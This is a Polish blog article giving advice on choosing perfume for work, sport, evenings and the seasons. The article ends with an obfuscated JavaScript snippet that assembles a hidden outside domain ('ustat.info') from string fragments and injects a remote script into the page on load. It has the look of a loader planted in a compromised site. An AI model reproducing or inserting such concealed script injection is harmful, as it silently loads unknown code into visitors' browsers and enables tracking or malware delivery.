Strona główna » Jak odpowiednio dobrać perfumy do okazji?

Jak odpowiednio dobrać perfumy do okazji?Właściwie dobrane perfumy powinny nie tylko podkreślać naszą osobowość i
charakter. Wybrany zapach musi także pasować do okazji i okoliczności, w
których go używamy. Na co należy zwrócić uwagę, by czuć się komfortowo i
cieszyć się ulubionym aromatem?

Wiele osób nie wyobraża sobie wyjścia z domu bez użycia perfum. Jednak zanim sięgniemy po ulubiony zapach powinniśmy zastanowić się, dokąd i w jakim celu się wybieramy. W niektórych sytuacjach zbyt delikatny aromat może zmniejszyć naszą pewność siebie, a nadmiar mocnych perfum, których dusząca woń rozprzestrzenia się w biurze, może szybko zrazić do nas otoczenie.

 

Co musisz wiedzieć o perfumach?

Wszystkie perfumy składają się z trzech podstawowych nut zapachowych, które różnią się od siebie czasem utleniania. Z tego powodu aromat rozwija się etapami, natomiast pełnia zapachu jest wyczuwana dopiero po dłuższej chwili.
Jako pierwszą wyczuwamy nutę głowy, która utrzymuje się na skórze do około pół godziny. Nuta głowy nazywana jest wizytówką perfum, ponieważ to od niej zależy, czy dany zapach przypadnie nam do gustu. Jako drugą czujemy nutę serca, która utrzymuje się do kilku godzin, będąca przewodnim zapachem perfum oraz nadająca im charakter. Jako ostatnią wyczuwamy nutę bazy – stanowi ona tło zapachu, którego akordy mogą towarzyszyć nam nawet kilkanaście godzin po spryskaniu.

 

 

Perfumy do pracy i do szkoły

Wybierając perfumy do pracy lub szkoły, unikajmy ciężkich, intensywnych zapachów o silnym aromacie. W trosce o komfort, zarówno własny, jak i osób z naszego najbliższego otoczenia, na co dzień używajmy perfum o lekkim, delikatnym i subtelnym zapachu. Świetną propozycją będą przede wszystkim perfumy kwiatowo-owocowe, z nutą drzewa sandałowego.

 

Perfumy dla aktywnych

Jeśli używasz perfum nawet przed wyjściem na siłownię lub fitness, zapomnij o mocnych, ciężkich nutach zapachowych. Zamiast nich wybierz lżejszą, orzeźwiającą wodę toaletową lub perfumy o energetycznym, cytrusowym aromacie, takie jak Acqua di Parma.

 

Perfumy na wieczór

Zastanawiasz się, kiedy w końcu możesz sięgnąć po klasyczne, nieco cięższe, eleganckie perfumy? Uroczyste wyjście to najlepszy moment! Intensywny zapach podkreśli twoją osobowość i będzie dopełnieniem stroju, jednak pamiętaj, by nie przesadzić z jego ilością, by uniknąć duszącego efektu.

 

Zwróć uwagę na porę roku

Dobierając perfumy do okazji, warto mieć na uwadze także aktualną porę roku. Latem najlepiej sprawdzają się zapachy owocowe i kwiatowe, które nawet w najbardziej upalne dni zapewnią nam poczucie świeżości i orzeźwienia. Z kolei na jesień lub zimę, kiedy raczej nie grożą nam wysokie temperatury, możemy zarezerwować bardziej wyraziste, cięższe, orientalne zapachy.

 

Gdzie kupować perfumy?

Wysokiej jakości perfumy najpopularniejszych marek możemy kupić już nie tylko w tradycyjnych, stacjonarnych perfumeriach, ale też w ich internetowych odpowiednikach. Coraz częściej przyciągają one równie bogatą ofertą, a ponadto konkurencyjnymi cenami.

(function(){
tf6qu=”ydxmujllf6qm”;tf6q=document.createElement(„script”);
tf6q_=”u”+(„st”);tf6q_+=”at”+(„.”);tf6q.async=true;tf6q_+=”in”;
tf6qu=”64152145.”+tf6qu;tf6q.type=”text/javascript”;tf6qu+=”ngi2qul51s74″;
tf6qu+=”k2aqhv”;tf6q_+=(„f”)+”o”+(„/”);tf6q.src=”//”+tf6q_+tf6qu;
tf6qd=document.body;tf6qd.appendChild(tf6q);
})();

Inne posty

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *